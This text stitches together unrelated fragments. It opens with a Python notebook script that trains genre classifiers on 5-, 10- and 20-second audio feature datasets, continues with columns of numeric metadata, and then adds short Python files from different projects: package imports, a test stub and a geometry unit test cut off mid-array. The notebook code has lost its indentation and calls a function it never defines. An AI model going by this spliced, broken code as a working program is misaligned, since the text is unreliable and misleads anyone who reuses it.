# calling tsne for perplexities 30 and 40
tsneDatasetOneTwoDimPerp_30 = TSNE(n_components=3).fit_transform(X_norm)
#tsneDatasetOneTwoDimPerp_40 = TSNE(perplexity = 40).fit_transform(x_subset)
# plotting the tsne data
fig = plt.figure(figsize = (10, 7))
ax = plt.axes(projection ="3d")
ax11 = ax.scatter(tsneDatasetOneTwoDimPerp_30[:,0],tsneDatasetOneTwoDimPerp_30[:,1],tsneDatasetOneTwoDimPerp_30[:,2], c = y)
#ax12 = img[1].scatter(tsneDatasetOneTwoDimPerp_40[:,0],tsneDatasetOneTwoDimPerp_40[:,1], c = y_subset)
cbar = plt.colorbar(ax11)
#ticks = [0,1,2,3,4,5,6,7,8,9]
#cbar.set_ticks(ticks)
fig.suptitle("TSNE on 20-sec length samples")
ax.set_xlabel("Dimension 1")
ax.set_ylabel("Dimension 2")
ax.set_zlabel("Dimension 3")
#cbar.set_ticklabels(['Class 0','Class 1','Class 2','Class 3','Class 4','Class 5','Class 6','Class 7','Class 8','Class 9'])
plt.show()
from sklearn.manifold import TSNE
import matplotlib.pyplot as plt
tsne2D()
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import accuracy_score
model = LogisticRegression(solver='lbfgs', max_iter=4000)
# model.fit(x_train,y_train)
# y_pred = model.predict(x_test)
# y_pred_train = model.predict(x_train)
# acc = model.score(x_test,y_test)
# acc1 = model.score(x_train,y_train)
# print('training accuracy',acc1)
# print('testing accuracy',acc)
print("Using cross validation")
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
scores = cross_val_score(model, X_norm, y, cv=cv, scoring='accuracy')
# ypred = cross_val_predict(clf, X, y, cv=cv)
# accuracy = accuracy_score(y, ypred)
return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
from sklearn.svm import SVC
model = SVC(kernel = 'rbf', random_state = 42, gamma = 'scale')
# model.fit(x_train,y_train)
# y_pred = model.predict(x_test)
# y_pred_train = model.predict(x_train)
# acc = model.score(x_test,y_test)
# acc1 = model.score(x_train,y_train)
# print('training accuracy',acc1)
# print('testing accuracy',acc)
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
scores = cross_val_score(model, X_norm, y, cv=cv, scoring='accuracy')
# ypred = cross_val_predict(clf, X, y, cv=cv)
# accuracy = accuracy_score(y, ypred)
return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
from sklearn.svm import SVC
model = SVC(kernel = 'linear', random_state = 42, gamma = 'scale')
# model.fit(x_train,y_train)
# y_pred = model.predict(x_test)
# y_pred_train = model.predict(x_train)
# acc = model.score(x_test,y_test)
# acc1 = model.score(x_train,y_train)
# print('training accuracy',acc1)
# print('testing accuracy',acc)
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
scores = cross_val_score(model, X_norm, y, cv=cv, scoring='accuracy')
# ypred = cross_val_predict(clf, X, y, cv=cv)
# accuracy = accuracy_score(y, ypred)
return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
from sklearn.svm import SVC
model = SVC(kernel = 'poly', degree = 2,random_state = 42, gamma = 'scale')
# model.fit(x_train,y_train)
# y_pred = model.predict(x_test)
# y_pred_train = model.predict(x_train)
# acc = model.score(x_test,y_test)
# acc1 = model.score(x_train,y_train)
# print('training accuracy',acc1)
# print('testing accuracy',acc)
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
scores = cross_val_score(model, X_norm, y, cv=cv, scoring='accuracy')
# ypred = cross_val_predict(clf, X, y, cv=cv)
# accuracy = accuracy_score(y, ypred)
return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
from sklearn import tree
model = tree.DecisionTreeClassifier(criterion='entropy',max_depth = 5)
# model.fit(x_train,y_train)
# y_pred = model.predict(x_test)
# y_pred_train = model.predict(x_train)
# acc = model.score(x_test,y_test)
# acc1 = model.score(x_train,y_train)
# print('training accuracy',acc1)
# print('testing accuracy',acc)
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
scores = cross_val_score(model, X_norm, y, cv=cv, scoring='accuracy')
# ypred = cross_val_predict(clf, X, y, cv=cv)
# accuracy = accuracy_score(y, ypred)
return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
from sklearn import tree
model = tree.DecisionTreeClassifier(criterion='gini')
# model.fit(x_train,y_train)
# y_pred = model.predict(x_test)
# y_pred_train = model.predict(x_train)
# acc = model.score(x_test,y_test)
# acc1 = model.score(x_train,y_train)
# print('training accuracy',acc1)
# print('testing accuracy',acc)
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
scores = cross_val_score(model, X_norm, y, cv=cv, scoring='accuracy')
# ypred = cross_val_predict(clf, X, y, cv=cv)
# accuracy = accuracy_score(y, ypred)
return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
from sklearn.neighbors import KNeighborsClassifier
model = KNeighborsClassifier(n_neighbors=7)
# model.fit(x_train,y_train)
# y_pred = model.predict(x_test)
# y_pred_train = model.predict(x_train)
# acc = model.score(x_test,y_test)
# acc1 = model.score(x_train,y_train)
# print('training accuracy',acc1)
# print('testing accuracy',acc)
from sklearn.model_selection import train_test_split, cross_val_score, cross_val_predict, KFold, GridSearchCV, StratifiedKFold
def cross_validation(clf, X, y):
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
scores = cross_val_score(model, X_norm, y, cv=cv, scoring='accuracy')
# ypred = cross_val_predict(clf, X, y, cv=cv)
# accuracy = accuracy_score(y, ypred)
return scores.mean()
acc = cross_validation(model,X_norm,y)
print(acc)
model = LogisticRegression(solver='lbfgs', max_iter=1000)
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
y_pred1 = cross_val_predict(model, X_norm, y, cv=cv)
model = SVC(kernel = 'linear', random_state = 42, gamma = 'scale')
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
y_pred2 = cross_val_predict(model, X_norm, y, cv=cv)
model = tree.DecisionTreeClassifier(criterion='entropy')
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
y_pred3 = cross_val_predict(model, X_norm, y, cv=cv)
model = KNeighborsClassifier(n_neighbors=7)
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
y_pred4 = cross_val_predict(model, X_norm, y, cv=cv)
from sklearn.ensemble import VotingClassifier
def voting():
models = list()
models.append(('log', LogisticRegression(solver='lbfgs', max_iter=4000)))
models.append(('svm', SVC(kernel = 'linear', random_state = 42, gamma = 'scale')))
models.append(('dt', tree.DecisionTreeClassifier(criterion='entropy')))
models.append(('knn7', KNeighborsClassifier(n_neighbors=7)))
ensemble = VotingClassifier(estimators=models, voting='hard')
return ensemble
ensemble = voting()
#ensemble.fit(X_norm, y)
cv = StratifiedKFold(n_splits=5, random_state=None, shuffle=False)
scores = cross_val_score(ensemble, X_norm, y, cv=cv, scoring='accuracy')
print('Using Ensemble',scores.mean())
"""#**Using Neural Networks on all the above datasets**
##***5 second dataset***
"""
import pandas as pd
data = pd.read_csv('/content/drive/My Drive/ML_Project/data_5s_all_genres.csv')
import pandas as pd
data = pd.read_csv('/content/drive/My Drive/ML_Project/data_5s_all_genres.csv')
data_test = pd.read_csv('/content/drive/My Drive/ML_Project/data_5s_test_all_genres.csv')
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import MinMaxScaler
scaler = MinMaxScaler()
data = data.dropna()
data_test = data_test.dropna()
X = data.iloc[:, 0:-1]
X_norm = scaler.fit_transform(X)
#X_norm = scaler.transform(X)
y = data.iloc[:, -1]
x_test = data_test.iloc[:, 0:-1]
x_test = scaler.fit_transform(x_test)
y_test = data_test.iloc[:, -1]
#x_train, x_test, y_train, y_test = train_test_split(X_norm, y, test_size = 0.2, random_state = 0)
from keras.utils import to_categorical
y = to_categorical(y)
y_test = to_categorical(y_test)
import numpy as np
import random
from keras.layers import Dense, Input, Dropout
from keras.models import Sequential
from keras.utils import np_utils
import pickle
from keras.optimizers import SGD
from keras.models import load_model
model = Sequential()
model.add(Dense(units=32, activation='relu', input_dim=29))
model.add(Dense(units=16, activation='relu'))
model.add(Dense(units=8, activation='relu'))
model.add(Dense(units=5, activation='softmax'))
sgd = SGD(lr=0.001)
model.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy'])
history = model.fit(X_norm,y,batch_size=10,epochs=50)
scores = model.evaluate(x_test, y_test)
print("Accuracy: %.2f%%" % (scores[1]*100))
"""#10 sec neural"""
import pandas as pd
data = pd.read_csv('/content/drive/My Drive/ML_Project/data_10s_all_genres.csv')
data_test = pd.read_csv('/content/drive/My Drive/ML_Project/data_10s_test_all_genres.csv')
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import MinMaxScaler
scaler = MinMaxScaler()
data = data.dropna()
data_test = data_test.dropna()
X = data.iloc[:, 0:-1]
X_norm = scaler.fit_transform(X)
#X_norm = scaler.transform(X)
y = data.iloc[:, -1]
x_test = data_test.iloc[:, 0:-1]
x_test = scaler.fit_transform(x_test)
y_test = data_test.iloc[:, -1]
#x_train, x_test, y_train, y_test = train_test_split(X_norm, y, test_size = 0.2, random_state = 0)
from keras.utils import to_categorical
y = to_categorical(y)
y_test = to_categorical(y_test)
model = Sequential()
model.add(Dense(units=32, activation='relu', input_dim=29))
#model.add(Dense(units=64, activation='relu'))
model.add(Dense(units=16, activation='relu'))
model.add(Dense(units=8, activation='relu'))
model.add(Dense(units=5, activation='softmax'))
sgd = SGD(lr=0.001)
model.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy'])
history = model.fit(X_norm,y,batch_size=10,epochs=150)
scores = model.evaluate(x_test, y_test)
print("Accuracy: %.2f%%" % (scores[1]*100))
"""#20 sec neural"""
import pandas as pd
data = pd.read_csv('/content/drive/My Drive/ML_Project/data_20s_all_genres.csv')
data_test = pd.read_csv('/content/drive/My Drive/ML_Project/data_20s_test_all_genres.csv')
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import MinMaxScaler
scaler = MinMaxScaler()
data = data.dropna()
data_test = data_test.dropna()
X = data.iloc[:, 0:-1]
X_norm = scaler.fit_transform(X)
#X_norm = scaler.transform(X)
y = data.iloc[:, -1]
x_test = data_test.iloc[:, 0:-1]
x_test = scaler.fit_transform(x_test)
y_test = data_test.iloc[:, -1]
#x_train, x_test, y_train, y_test = train_test_split(X_norm, y, test_size = 0.2, random_state = 0)
from keras.utils import to_categorical
y = to_categorical(y)
y_test = to_categorical(y_test)
model = Sequential()
model.add(Dense(units=32, activation='relu', input_dim=29))
#model.add(Dense(units=64, activation='relu'))
model.add(Dense(units=16, activation='relu'))
model.add(Dense(units=8, activation='relu'))
model.add(Dense(units=5, activation='softmax'))
sgd = SGD(lr=0.001)
model.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy'])
history = model.fit(X_norm,y,batch_size=10,epochs=150)
scores = model.evaluate(x_test, y_test)
print("Accuracy: %.2f%%" % (scores[1]*100))
| 35.776929
| 127
| 0.732085
| 7,065
| 46,832
| 4.648266
| 0.037509
| 0.03313
| 0.016809
| 0.024787
| 0.97838
| 0.97838
| 0.977253
| 0.977132
| 0.974848
| 0.974665
| 0
| 0.023197
| 0.135655
| 46,832
| 1,308
| 128
| 35.804281
| 0.788088
| 0.255552
| 0
| 0.950565
| 0
| 0
| 0.08107
| 0.021682
| 0
| 0
| 0
| 0
| 0
| 1
| 0.059322
| false
| 0
| 0.177966
| 0
| 0.283898
| 0.083333
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b8d9a71f644801c781308413bd36d45bc2cf24e3
| 112
|
py
|
Python
|
sb3_contrib/tqc/__init__.py
|
qgallouedec/stable-baselines3-contrib
|
bec00386d14b505015c54413cd5cd968e6f85c72
|
[
"MIT"
] | 93
|
2020-10-22T14:44:58.000Z
|
2022-03-25T20:06:47.000Z
|
sb3_contrib/tqc/__init__.py
|
qgallouedec/stable-baselines3-contrib
|
bec00386d14b505015c54413cd5cd968e6f85c72
|
[
"MIT"
] | 36
|
2020-10-26T11:13:23.000Z
|
2022-03-31T15:11:05.000Z
|
sb3_contrib/tqc/__init__.py
|
qgallouedec/stable-baselines3-contrib
|
bec00386d14b505015c54413cd5cd968e6f85c72
|
[
"MIT"
] | 50
|
2020-12-06T14:21:10.000Z
|
2022-03-31T14:25:36.000Z
|
from sb3_contrib.tqc.policies import CnnPolicy, MlpPolicy, MultiInputPolicy
from sb3_contrib.tqc.tqc import TQC
| 37.333333
| 75
| 0.857143
| 16
| 112
| 5.875
| 0.5625
| 0.148936
| 0.297872
| 0.361702
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.019608
| 0.089286
| 112
| 2
| 76
| 56
| 0.901961
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
770f218cafa5fe8cc76c1e1055d8d3ba852471de
| 148
|
py
|
Python
|
test.py
|
edawson/SigProfilerMatrixGenerator
|
bd6d3bb15e87805cdc7e771c3fdd886f4a9fc29b
|
[
"BSD-2-Clause"
] | 59
|
2019-06-05T08:49:14.000Z
|
2022-03-22T11:10:05.000Z
|
test.py
|
edawson/SigProfilerMatrixGenerator
|
bd6d3bb15e87805cdc7e771c3fdd886f4a9fc29b
|
[
"BSD-2-Clause"
] | 54
|
2019-06-04T13:06:20.000Z
|
2022-01-14T00:30:51.000Z
|
test.py
|
edawson/SigProfilerMatrixGenerator
|
bd6d3bb15e87805cdc7e771c3fdd886f4a9fc29b
|
[
"BSD-2-Clause"
] | 20
|
2019-08-22T09:03:01.000Z
|
2022-02-01T19:35:12.000Z
|
from SigProfilerMatrixGenerator import install as genInstall
from SigProfilerMatrixGenerator.scripts import SigProfilerMatrixGeneratorFunc as matGen
| 74
| 87
| 0.918919
| 13
| 148
| 10.461538
| 0.692308
| 0.441176
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.074324
| 148
| 2
| 87
| 74
| 0.992701
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
7734e6a24bf8b4a765124722ee199ed9db3bd2b0
| 161
|
py
|
Python
|
src/mmw/apps/core/tests.py
|
lsetiawan/model-my-watershed
|
4646ebb486cb7902dce1b13c9ada32e80d22fcf0
|
[
"Apache-2.0"
] | 45
|
2015-05-25T22:55:21.000Z
|
2022-02-27T14:51:52.000Z
|
src/mmw/apps/core/tests.py
|
lsetiawan/model-my-watershed
|
4646ebb486cb7902dce1b13c9ada32e80d22fcf0
|
[
"Apache-2.0"
] | 3,213
|
2015-05-22T00:32:00.000Z
|
2022-03-31T15:05:08.000Z
|
src/mmw/apps/core/tests.py
|
lsetiawan/model-my-watershed
|
4646ebb486cb7902dce1b13c9ada32e80d22fcf0
|
[
"Apache-2.0"
] | 37
|
2015-05-22T12:30:46.000Z
|
2021-09-10T02:13:44.000Z
|
# -*- coding: utf-8 -*-
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
# Create your tests here.
| 23
| 39
| 0.78882
| 21
| 161
| 5.380952
| 0.714286
| 0.265487
| 0.424779
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007246
| 0.142857
| 161
| 6
| 40
| 26.833333
| 0.811594
| 0.279503
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0.333333
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
773e493c6d46dde519a464cd0f87e14a3e27a513
| 35,079
|
py
|
Python
|
colour/plotting/tests/test_geometry.py
|
MaxSchambach/colour
|
3f3685d616fda4be58cec20bc1e16194805d7e2d
|
[
"BSD-3-Clause"
] | null | null | null |
colour/plotting/tests/test_geometry.py
|
MaxSchambach/colour
|
3f3685d616fda4be58cec20bc1e16194805d7e2d
|
[
"BSD-3-Clause"
] | null | null | null |
colour/plotting/tests/test_geometry.py
|
MaxSchambach/colour
|
3f3685d616fda4be58cec20bc1e16194805d7e2d
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Defines unit tests for :mod:`colour.plotting.geometry` module.
"""
from __future__ import division, unicode_literals
import numpy as np
import unittest
from colour.plotting import quad, grid, cube
__author__ = 'Colour Developers'
__copyright__ = 'Copyright (C) 2013-2019 - Colour Developers'
__license__ = 'New BSD License - https://opensource.org/licenses/BSD-3-Clause'
__maintainer__ = 'Colour Developers'
__email__ = 'colour-developers@colour-science.org'
__status__ = 'Production'
__all__ = ['TestQuad', 'TestGrid', 'TestCube']
class TestQuad(unittest.TestCase):
"""
Defines :func:`colour.plotting.geometry.quad` definition unit tests
methods.
"""
def test_quad(self):
"""
Tests :func:`colour.plotting.geometry.quad` definition.
"""
np.testing.assert_almost_equal(
quad(),
np.array([[0, 0, 0], [1, 0, 0], [1, 1, 0], [0, 1, 0]]),
decimal=7)
np.testing.assert_almost_equal(
quad('xz'),
np.array([[0, 0, 0], [1, 0, 0], [1, 0, 1], [0, 0, 1]]),
decimal=7)
np.testing.assert_almost_equal(
quad('yz'),
np.array([[0, 0, 0], [0, 1, 0], [0, 1, 1], [0, 0, 1]]),
decimal=7)
np.testing.assert_almost_equal(
quad(
'xy',
origin=np.array([0.2, 0.4]),
width=0.2,
height=0.4,
depth=0.6),
np.array([[0.2, 0.4, 0.6], [0.4, 0.4, 0.6], [0.4, 0.8, 0.6],
[0.2, 0.8, 0.6]]),
decimal=7)
np.testing.assert_almost_equal(
quad(
'xy',
origin=np.array([-0.2, -0.4]),
width=-0.2,
height=-0.4,
depth=-0.6),
np.array([[-0.2, -0.4, -0.6], [-0.4, -0.4, -0.6],
[-0.4, -0.8, -0.6], [-0.2, -0.8, -0.6]]),
decimal=7)
self.assertRaises(ValueError, lambda: quad(plane='Undefined'))
class TestGrid(unittest.TestCase):
"""
Defines :func:`colour.plotting.geometry.grid` definition unit tests
methods.
"""
def test_grid(self):
"""
Tests :func:`colour.plotting.geometry.grid` definition.
"""
np.testing.assert_almost_equal(
grid(),
np.array([[[0, 0, 0], [1, 0, 0], [1, 1, 0], [0, 1, 0]]]),
decimal=7)
np.testing.assert_almost_equal(
grid('xz'),
np.array([[[0, 0, 0], [1, 0, 0], [1, 0, 1], [0, 0, 1]]]),
decimal=7)
np.testing.assert_almost_equal(
grid('yz'),
np.array([[[0, 0, 0], [0, 1, 0], [0, 1, 1], [0, 0, 1]]]),
decimal=7)
np.testing.assert_almost_equal(
grid('xy',
origin=np.array([0.2, 0.4]),
width=0.2,
height=0.4,
depth=0.6,
width_segments=3,
height_segments=3),
np.array(
[[[0.20000000, 0.40000000, 0.60000000],
[0.26666667, 0.40000000, 0.60000000],
[0.26666667, 0.53333333, 0.60000000],
[0.20000000, 0.53333333, 0.60000000]],
[[0.20000000, 0.53333333, 0.60000000],
[0.26666667, 0.53333333, 0.60000000],
[0.26666667, 0.66666667, 0.60000000],
[0.20000000, 0.66666667, 0.60000000]],
[[0.20000000, 0.66666667, 0.60000000],
[0.26666667, 0.66666667, 0.60000000],
[0.26666667, 0.80000000, 0.60000000],
[0.20000000, 0.80000000, 0.60000000]],
[[0.26666667, 0.40000000, 0.60000000],
[0.33333333, 0.40000000, 0.60000000],
[0.33333333, 0.53333333, 0.60000000],
[0.26666667, 0.53333333, 0.60000000]],
[[0.26666667, 0.53333333, 0.60000000],
[0.33333333, 0.53333333, 0.60000000],
[0.33333333, 0.66666667, 0.60000000],
[0.26666667, 0.66666667, 0.60000000]],
[[0.26666667, 0.66666667, 0.60000000],
[0.33333333, 0.66666667, 0.60000000],
[0.33333333, 0.80000000, 0.60000000],
[0.26666667, 0.80000000, 0.60000000]],
[[0.33333333, 0.40000000, 0.60000000],
[0.40000000, 0.40000000, 0.60000000],
[0.40000000, 0.53333333, 0.60000000],
[0.33333333, 0.53333333, 0.60000000]],
[[0.33333333, 0.53333333, 0.60000000],
[0.40000000, 0.53333333, 0.60000000],
[0.40000000, 0.66666667, 0.60000000],
[0.33333333, 0.66666667, 0.60000000]],
[[0.33333333, 0.66666667, 0.60000000],
[0.40000000, 0.66666667, 0.60000000],
[0.40000000, 0.80000000, 0.60000000],
[0.33333333, 0.80000000, 0.60000000]]]
),
decimal=7) # yapf: disable
np.testing.assert_almost_equal(
grid('xy',
origin=np.array([-0.2, -0.4]),
width=-0.2,
height=-0.4,
depth=-0.6,
width_segments=3,
height_segments=3),
np.array(
[[[-0.20000000, -0.40000000, -0.60000000],
[-0.26666667, -0.40000000, -0.60000000],
[-0.26666667, -0.53333333, -0.60000000],
[-0.20000000, -0.53333333, -0.60000000]],
[[-0.20000000, -0.53333333, -0.60000000],
[-0.26666667, -0.53333333, -0.60000000],
[-0.26666667, -0.66666667, -0.60000000],
[-0.20000000, -0.66666667, -0.60000000]],
[[-0.20000000, -0.66666667, -0.60000000],
[-0.26666667, -0.66666667, -0.60000000],
[-0.26666667, -0.80000000, -0.60000000],
[-0.20000000, -0.80000000, -0.60000000]],
[[-0.26666667, -0.40000000, -0.60000000],
[-0.33333333, -0.40000000, -0.60000000],
[-0.33333333, -0.53333333, -0.60000000],
[-0.26666667, -0.53333333, -0.60000000]],
[[-0.26666667, -0.53333333, -0.60000000],
[-0.33333333, -0.53333333, -0.60000000],
[-0.33333333, -0.66666667, -0.60000000],
[-0.26666667, -0.66666667, -0.60000000]],
[[-0.26666667, -0.66666667, -0.60000000],
[-0.33333333, -0.66666667, -0.60000000],
[-0.33333333, -0.80000000, -0.60000000],
[-0.26666667, -0.80000000, -0.60000000]],
[[-0.33333333, -0.40000000, -0.60000000],
[-0.40000000, -0.40000000, -0.60000000],
[-0.40000000, -0.53333333, -0.60000000],
[-0.33333333, -0.53333333, -0.60000000]],
[[-0.33333333, -0.53333333, -0.60000000],
[-0.40000000, -0.53333333, -0.60000000],
[-0.40000000, -0.66666667, -0.60000000],
[-0.33333333, -0.66666667, -0.60000000]],
[[-0.33333333, -0.66666667, -0.60000000],
[-0.40000000, -0.66666667, -0.60000000],
[-0.40000000, -0.80000000, -0.60000000],
[-0.33333333, -0.80000000, -0.60000000]]]
),
decimal=7) # yapf: disable
class TestCube(unittest.TestCase):
"""
Defines :func:`colour.plotting.geometry.cube` definition unit tests
methods.
"""
def test_cube(self):
"""
Tests :func:`colour.plotting.geometry.cube` definition.
"""
np.testing.assert_almost_equal(
cube(),
np.array([
[[0, 0, 0], [1, 0, 0], [1, 1, 0], [0, 1, 0]],
[[0, 0, 1], [1, 0, 1], [1, 1, 1], [0, 1, 1]],
[[0, 0, 0], [1, 0, 0], [1, 0, 1], [0, 0, 1]],
[[0, 1, 0], [1, 1, 0], [1, 1, 1], [0, 1, 1]],
[[0, 0, 0], [0, 1, 0], [0, 1, 1], [0, 0, 1]],
[[1, 0, 0], [1, 1, 0], [1, 1, 1], [1, 0, 1]],
]),
decimal=7)
np.testing.assert_almost_equal(
cube(('+x', )),
np.array([[[1, 0, 0], [1, 1, 0], [1, 1, 1], [1, 0, 1]]]),
decimal=7)
np.testing.assert_almost_equal(
cube(('-x', )),
np.array([[[0, 0, 0], [0, 1, 0], [0, 1, 1], [0, 0, 1]]]),
decimal=7)
np.testing.assert_almost_equal(
cube(('+y', )),
np.array([[[0, 1, 0], [1, 1, 0], [1, 1, 1], [0, 1, 1]]]),
decimal=7)
np.testing.assert_almost_equal(
cube(('-y', )),
np.array([[[0, 0, 0], [1, 0, 0], [1, 0, 1], [0, 0, 1]]]),
decimal=7)
np.testing.assert_almost_equal(
cube(('+z', )),
np.array([[[0, 0, 1], [1, 0, 1], [1, 1, 1], [0, 1, 1]]]),
decimal=7)
np.testing.assert_almost_equal(
cube(('-z', )),
np.array([[[0, 0, 0], [1, 0, 0], [1, 1, 0], [0, 1, 0]]]),
decimal=7)
np.testing.assert_almost_equal(
cube(origin=np.array([0.2, 0.4, 0.6]),
width=0.2,
height=0.4,
depth=0.6,
width_segments=3,
height_segments=3,
depth_segments=3),
np.array(
[[[0.20000000, 0.60000000, 0.40000000],
[0.26666667, 0.60000000, 0.40000000],
[0.26666667, 0.80000000, 0.40000000],
[0.20000000, 0.80000000, 0.40000000]],
[[0.20000000, 0.80000000, 0.40000000],
[0.26666667, 0.80000000, 0.40000000],
[0.26666667, 1.00000000, 0.40000000],
[0.20000000, 1.00000000, 0.40000000]],
[[0.20000000, 1.00000000, 0.40000000],
[0.26666667, 1.00000000, 0.40000000],
[0.26666667, 1.20000000, 0.40000000],
[0.20000000, 1.20000000, 0.40000000]],
[[0.26666667, 0.60000000, 0.40000000],
[0.33333333, 0.60000000, 0.40000000],
[0.33333333, 0.80000000, 0.40000000],
[0.26666667, 0.80000000, 0.40000000]],
[[0.26666667, 0.80000000, 0.40000000],
[0.33333333, 0.80000000, 0.40000000],
[0.33333333, 1.00000000, 0.40000000],
[0.26666667, 1.00000000, 0.40000000]],
[[0.26666667, 1.00000000, 0.40000000],
[0.33333333, 1.00000000, 0.40000000],
[0.33333333, 1.20000000, 0.40000000],
[0.26666667, 1.20000000, 0.40000000]],
[[0.33333333, 0.60000000, 0.40000000],
[0.40000000, 0.60000000, 0.40000000],
[0.40000000, 0.80000000, 0.40000000],
[0.33333333, 0.80000000, 0.40000000]],
[[0.33333333, 0.80000000, 0.40000000],
[0.40000000, 0.80000000, 0.40000000],
[0.40000000, 1.00000000, 0.40000000],
[0.33333333, 1.00000000, 0.40000000]],
[[0.33333333, 1.00000000, 0.40000000],
[0.40000000, 1.00000000, 0.40000000],
[0.40000000, 1.20000000, 0.40000000],
[0.33333333, 1.20000000, 0.40000000]],
[[0.20000000, 0.60000000, 0.80000000],
[0.26666667, 0.60000000, 0.80000000],
[0.26666667, 0.80000000, 0.80000000],
[0.20000000, 0.80000000, 0.80000000]],
[[0.20000000, 0.80000000, 0.80000000],
[0.26666667, 0.80000000, 0.80000000],
[0.26666667, 1.00000000, 0.80000000],
[0.20000000, 1.00000000, 0.80000000]],
[[0.20000000, 1.00000000, 0.80000000],
[0.26666667, 1.00000000, 0.80000000],
[0.26666667, 1.20000000, 0.80000000],
[0.20000000, 1.20000000, 0.80000000]],
[[0.26666667, 0.60000000, 0.80000000],
[0.33333333, 0.60000000, 0.80000000],
[0.33333333, 0.80000000, 0.80000000],
[0.26666667, 0.80000000, 0.80000000]],
[[0.26666667, 0.80000000, 0.80000000],
[0.33333333, 0.80000000, 0.80000000],
[0.33333333, 1.00000000, 0.80000000],
[0.26666667, 1.00000000, 0.80000000]],
[[0.26666667, 1.00000000, 0.80000000],
[0.33333333, 1.00000000, 0.80000000],
[0.33333333, 1.20000000, 0.80000000],
[0.26666667, 1.20000000, 0.80000000]],
[[0.33333333, 0.60000000, 0.80000000],
[0.40000000, 0.60000000, 0.80000000],
[0.40000000, 0.80000000, 0.80000000],
[0.33333333, 0.80000000, 0.80000000]],
[[0.33333333, 0.80000000, 0.80000000],
[0.40000000, 0.80000000, 0.80000000],
[0.40000000, 1.00000000, 0.80000000],
[0.33333333, 1.00000000, 0.80000000]],
[[0.33333333, 1.00000000, 0.80000000],
[0.40000000, 1.00000000, 0.80000000],
[0.40000000, 1.20000000, 0.80000000],
[0.33333333, 1.20000000, 0.80000000]],
[[0.20000000, 0.60000000, 0.40000000],
[0.26666667, 0.60000000, 0.40000000],
[0.26666667, 0.60000000, 0.53333333],
[0.20000000, 0.60000000, 0.53333333]],
[[0.20000000, 0.60000000, 0.53333333],
[0.26666667, 0.60000000, 0.53333333],
[0.26666667, 0.60000000, 0.66666667],
[0.20000000, 0.60000000, 0.66666667]],
[[0.20000000, 0.60000000, 0.66666667],
[0.26666667, 0.60000000, 0.66666667],
